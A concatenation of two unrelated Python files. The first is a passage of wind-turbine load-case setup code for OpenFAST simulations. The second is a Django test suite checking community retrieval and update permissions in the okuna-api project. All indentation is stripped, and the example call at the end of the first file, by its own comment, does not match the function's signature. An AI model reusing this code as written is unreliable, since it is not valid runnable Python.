if metocean_U_init == []:
metocean_U_init = [4.00, 6.00, 8.00, 10.00, 12.00, 14.00, 16.00, 18.00, 20.00, 22.00, 24.00]
metocean_Hs_init = [1.908567568, 1.960162595, 2.062722244, 2.224539415, 2.489931091, 2.802984019, 3.182301485, 3.652236101, 4.182596165, 4.695439504, 5.422289377]
metocean_Tp_init = [12.23645701, 12.14497777, 11.90254947, 11.5196666, 11.05403739, 10.65483551, 10.27562225, 10.13693777, 10.27842325, 10.11660396, 10.96177917]
ptfm_heave = [np.interp(Vrated, ptfm_U_init, ptfm_heave_init)]
ptfm_surge = [np.interp(Vrated, ptfm_U_init, ptfm_surge_init)]
ptfm_pitch = [np.interp(Vrated, ptfm_U_init, ptfm_pitch_init)]
metocean_Hs = [np.interp(Vrated, metocean_U_init, metocean_Hs_init)]
metocean_Tp = [np.interp(Vrated, metocean_U_init, metocean_Tp_init)]
else:
floating = False
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","DT")] = {'vals':[dt], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':[Vrated], 'group':0}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':[omega], 'group':0}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':[pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch2")] = {'vals':[pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch3")] = {'vals':[pitch], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
if floating:
case_inputs[("ElastoDyn","PtfmSurge")] = {'vals':ptfm_surge, 'group':1}
case_inputs[("ElastoDyn","PtfmHeave")] = {'vals':ptfm_heave, 'group':1}
case_inputs[("ElastoDyn","PtfmPitch")] = {'vals':ptfm_pitch, 'group':1}
case_inputs[("HydroDyn","WaveHs")] = {'vals':metocean_Hs, 'group':1}
case_inputs[("HydroDyn","WaveTp")] = {'vals':metocean_Tp, 'group':1}
case_inputs[("HydroDyn","RdtnDT")] = {'vals':[dt], 'group':0}
case_inputs[("HydroDyn","WaveMod")] = {'vals':[1], 'group':0}
namebase += '_rated'
case_list, case_name_list = CaseGen_General(case_inputs, dir_matrix=runDir, namebase=namebase)
channels = ["TipDxc1", "TipDyc1"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed"]
return case_list, case_name_list, channels
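# ---------------------------------------------------------------------------
# Minimal sketch of the interpolation used above: the rated operating point is
# read off the steady-state tables with np.interp. The demo numbers below are
# made-up placeholders, not turbine data (relies on this module's numpy import).
def _sketch_rated_initial_conditions(Vrated=11.4):
    U_demo = [10., 11., 12.]          # wind speeds, m/s
    Omega_demo = [11.0, 12.1, 12.1]   # rotor speeds, rpm
    return np.interp(Vrated, U_demo, Omega_demo)  # -> 12.1 rpm at 11.4 m/s
# ---------------------------------------------------------------------------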
def RotorSE_DLC_1_4_Rated(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe=''):
# Default Runtime
T = 60.
TStart = 30.
# TStart = 0.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
iec = CaseGen_IEC()
iec.init_cond[("ElastoDyn","RotSpeed")] = {'U': U_init}
iec.init_cond[("ElastoDyn","RotSpeed")]['val'] = Omega_init
iec.init_cond[("ElastoDyn","BlPitch1")] = {'U': U_init}
iec.init_cond[("ElastoDyn","BlPitch1")]['val'] = pitch_init
iec.init_cond[("ElastoDyn","BlPitch2")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.init_cond[("ElastoDyn","BlPitch3")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.Turbine_Class = turbine_class
iec.Turbulence_Class = turbulence_class
iec.D = fst_vt['ElastoDyn']['TipRad']*2.
iec.z_hub = fst_vt['InflowWind']['RefHt']
iec.dlc_inputs = {}
iec.dlc_inputs['DLC'] = [1.4]
iec.dlc_inputs['U'] = [[Vrated]]
iec.dlc_inputs['Seeds'] = [[]]
iec.dlc_inputs['Yaw'] = [[]]
iec.transient_dir_change = '-' # '+','-','both': sign for transient events in EDC, EWS
iec.transient_shear_orientation = 'v' # 'v','h','both': vertical or horizontal shear for EWS
iec.wind_dir = runDir
iec.case_name_base = namebase + '_gust'
iec.Turbsim_exe = ''
iec.debug_level = 0
iec.parallel_windfile_gen = False
iec.run_dir = runDir
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
case_list, case_name_list = iec.execute(case_inputs=case_inputs)
channels = ["TipDxc1", "TipDyc1", "TipDzc1", "TipDxc2", "TipDyc2", "TipDzc2", "TipDxc3", "TipDyc3", "TipDzc3"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "NacYaw"]
channels += ["B1N1Fx", "B1N2Fx", "B1N3Fx", "B1N4Fx", "B1N5Fx", "B1N6Fx", "B1N7Fx", "B1N8Fx", "B1N9Fx"]
channels += ["B1N1Fy", "B1N2Fy", "B1N3Fy", "B1N4Fy", "B1N5Fy", "B1N6Fy", "B1N7Fy", "B1N8Fy", "B1N9Fy"]
return case_list, case_name_list, channels
def RotorSE_DLC_7_1_Steady(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, U, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe=''):
# Extreme 1yr return period wind speed with a power fault resulting in the blade not feathering
# Default Runtime
T = 60.
TStart = 30.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
Pitch = 0.
Omega = 0.
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':[U], 'group':0}
case_inputs[("InflowWind","PLexp")] = {'vals':[0.11], 'group':0}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':[Omega], 'group':0}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':[Pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch2")] = {'vals':[Pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch3")] = {'vals':[Pitch], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[0], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
namebase += '_idle50yr'
case_list, case_name_list = CaseGen_General(case_inputs, namebase=namebase, save_matrix=False)
channels = ["TipDxc1", "TipDyc1", "TipDzc1", "TipDxc2", "TipDyc2", "TipDzc2", "TipDxc3", "TipDyc3", "TipDzc3"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "NacYaw"]
channels += ["B1N1Fx", "B1N2Fx", "B1N3Fx", "B1N4Fx", "B1N5Fx", "B1N6Fx", "B1N7Fx", "B1N8Fx", "B1N9Fx"]
channels += ["B1N1Fy", "B1N2Fy", "B1N3Fy", "B1N4Fy", "B1N5Fy", "B1N6Fy", "B1N7Fy", "B1N8Fy", "B1N9Fy"]
return case_list, case_name_list, channels
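# ---------------------------------------------------------------------------
# Sketch of the power-law wind shear implied by PLexp above (the standard IEC
# profile; not WISDEM code): V(z) = V_hub * (z / z_hub) ** alpha, with
# alpha = 0.11 for extreme wind conditions.
def _sketch_power_law_shear(V_hub, z, z_hub, alpha=0.11):
    return V_hub * (z / z_hub) ** alpha
# ---------------------------------------------------------------------------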
def RotorSE_DLC_1_1_Turb(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, U, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', debug_level=0, cores=0, mpi_run=False, mpi_comm_map_down=[]):
# Default Runtime
T = 630.
TStart = 30.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
iec = CaseGen_IEC()
iec.init_cond[("ElastoDyn","RotSpeed")] = {'U': U_init}
iec.init_cond[("ElastoDyn","RotSpeed")]['val'] = [0.95*omega_i for omega_i in Omega_init]
iec.init_cond[("ElastoDyn","BlPitch1")] = {'U': U_init}
iec.init_cond[("ElastoDyn","BlPitch1")]['val'] = pitch_init
iec.init_cond[("ElastoDyn","BlPitch2")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.init_cond[("ElastoDyn","BlPitch3")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.Turbine_Class = turbine_class
iec.Turbulence_Class = turbulence_class
iec.D = fst_vt['ElastoDyn']['TipRad']*2.
iec.z_hub = fst_vt['InflowWind']['RefHt']
iec.dlc_inputs = {}
iec.dlc_inputs['DLC'] = [1.1]
iec.dlc_inputs['U'] = [[U]]
# iec.dlc_inputs['Seeds'] = [[1]]
iec.dlc_inputs['Seeds'] = [[310414237, 1764051066, 1935526301, 333954657, -960771537, 714191176]] # nothing special about these seeds, randomly generated
iec.dlc_inputs['Yaw'] = [[]]
iec.transient_dir_change = '-' # '+','-','both': sign for transient events in EDC, EWS
iec.transient_shear_orientation = 'v' # 'v','h','both': vertical or horizontal shear for EWS
iec.wind_dir = runDir
iec.case_name_base = namebase + '_turb'
iec.Turbsim_exe = Turbsim_exe
iec.debug_level = debug_level
iec.cores = cores
iec.run_dir = runDir
iec.overwrite = True
# iec.overwrite = False
if cores > 1:
iec.parallel_windfile_gen = True
else:
iec.parallel_windfile_gen = False
# mpi_run = False
if mpi_run:
iec.mpi_run = mpi_run
iec.comm_map_down = mpi_comm_map_down
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
case_list, case_name_list = iec.execute(case_inputs=case_inputs)
channels = ["TipDxc1", "TipDyc1", "TipDzc1", "TipDxc2", "TipDyc2", "TipDzc2", "TipDxc3", "TipDyc3", "TipDzc3"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "NacYaw"]
channels += ["B1N1Fx", "B1N2Fx", "B1N3Fx", "B1N4Fx", "B1N5Fx", "B1N6Fx", "B1N7Fx", "B1N8Fx", "B1N9Fx"]
channels += ["B1N1Fy", "B1N2Fy", "B1N3Fy", "B1N4Fy", "B1N5Fy", "B1N6Fy", "B1N7Fy", "B1N8Fy", "B1N9Fy"]
return case_list, case_name_list, channels
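# ---------------------------------------------------------------------------
# Sketch of the expected case count for the DLC 1.1 setup above, assuming
# CaseGen_IEC builds one simulation per (wind speed, seed) pair: one wind
# speed times six seeds gives six turbulent cases.
def _sketch_dlc11_case_count(wind_speeds, seeds):
    return len(wind_speeds) * len(seeds)  # e.g. 1 * 6 = 6
# ---------------------------------------------------------------------------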
if __name__ == "__main__":
# power_curve()
# Example call with placeholder arguments. Note that RotorSE_rated expects
# (fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, ...)
# and returns three values, so this invocation is illustrative only.
case_list, case_name_list, channels = RotorSE_rated('test', 60., 11., 12.1, 0.)
# ============================================================================
# openbook_communities/tests/views/community/test_views.py
# repo: TamaraAbells/okuna-api @ f87d8e80d2f182c01dbce68155ded0078ee707e4
# blob: 7cbd18f81e46f2db0487c08404e866f9deb90d70 | 41,954 bytes | license: MIT
# ============================================================================
import json
from django.conf import settings
from django.core.files import File
from django.urls import reverse
from faker import Faker
from rest_framework import status
from openbook_common.tests.models import OpenbookAPITestCase
from openbook_common.tests.helpers import make_user, make_authentication_headers_for_user, \
make_community_name, make_community, \
make_community_title, make_community_rules, make_community_description, make_community_user_adjective, \
make_community_users_adjective, make_community_avatar, make_community_cover, make_category, make_global_moderator, \
make_moderation_category
from openbook_communities.models import Community, CommunityNotificationsSubscription
from openbook_moderation.models import ModeratedObject
fake = Faker()
class CommunityAPITests(OpenbookAPITestCase):
"""
CommunityAPITests
"""
def test_can_retrieve_public_community(self):
"""
should be able to retrieve a public community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
parsed_response = json.loads(response.content)
self.assertIn('name', parsed_response)
response_name = parsed_response['name']
self.assertEqual(response_name, community_name)
def test_can_retrieve_private_community(self):
"""
should be able to retrieve a private community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='T')
community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
parsed_response = json.loads(response.content)
self.assertIn('name', parsed_response)
response_name = parsed_response['name']
self.assertEqual(response_name, community_name)
def test_cannot_retrieve_community_banned_from(self):
"""
should not be able to retrieve a community banned from and return 403
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community_owner = make_user()
community = make_community(creator=community_owner)
community_name = community.name
user.join_community_with_name(community_name=community.name)
community_owner.ban_user_with_username_from_community_with_name(username=user.username,
community_name=community.name)
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_non_member_cannot_update_community(self):
"""
a non member of a community should not be able to update a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, new_community_name)
def test_member_cannot_update_community(self):
"""
a community member should not be able to update a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community_name=community.name)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, new_community_name)
def test_moderator_cannot_update_community(self):
"""
a community moderator should not be able to update a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community_name=community.name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, new_community_name)
def test_can_update_administrated_community_name(self):
"""
should be able to update an administrated community name
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.name, new_community_name)
def test_cannot_update_administrated_community_name_to_taken_name(self):
"""
should not be able to update an administrated community name to an existing one and return 400
"""
user = make_user()
other_user = make_user()
other_community = make_community(creator=other_user)
community = make_community(creator=user)
data = {
'name': other_community.name
}
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, other_community.name)
def test_can_update_administrated_community_type(self):
"""
should be able to update an administrated community type
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user, type='P')
new_community_type = 'T'
data = {
'type': new_community_type
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.type, new_community_type)
def test_cannot_update_private_community_type(self):
"""
should NOT be able to update a private community type to public
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user, type='T')
new_community_type = 'P'
data = {
'type': new_community_type
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertEqual(community.type, 'T')
def test_can_update_administrated_community_title(self):
"""
should be able to update an administrated community title
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_title = make_community_title()
data = {
'title': new_community_title
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.title, new_community_title)
def test_can_update_administrated_community_users_adjective(self):
"""
should be able to update an administrated community users_adjective
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_users_adjective = make_community_users_adjective()
data = {
'users_adjective': new_community_users_adjective
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.users_adjective, new_community_users_adjective)
def test_can_update_administrated_community_invites_enabled(self):
"""
should be able to update an administrated community invites_enabled
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.invites_enabled = fake.boolean()
community.save()
new_invites_enabled = not community.invites_enabled
data = {
'invites_enabled': new_invites_enabled
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.invites_enabled, new_invites_enabled)
def test_can_update_administrated_community_user_adjective(self):
"""
should be able to update an administrated community user_adjective
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_user_adjective = make_community_user_adjective()
data = {
'user_adjective': new_community_user_adjective
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.user_adjective, new_community_user_adjective)
def test_can_update_administrated_community_color(self):
"""
should be able to update an administrated community color
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_color = fake.hex_color()
data = {
'color': new_community_color
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.color, new_community_color)
def test_can_update_administrated_community_description(self):
"""
should be able to update an administrated community description
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_description = make_community_description()
data = {
'description': new_community_description
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.description, new_community_description)
def test_can_update_administrated_community_description_with_type_unchanged(self):
"""
should be able to update an administrated community description with the same type
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_description = make_community_description()
data = {
'description': new_community_description,
'type': 'P'
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.description, new_community_description)
def test_can_update_administrated_community_rules(self):
"""
should be able to update an administrated community rules
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_rules = make_community_rules()
data = {
'rules': new_community_rules
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.rules, new_community_rules)
def test_can_delete_administrated_community_description(self):
"""
should be able to delete the administrated community description and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'description': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.description)
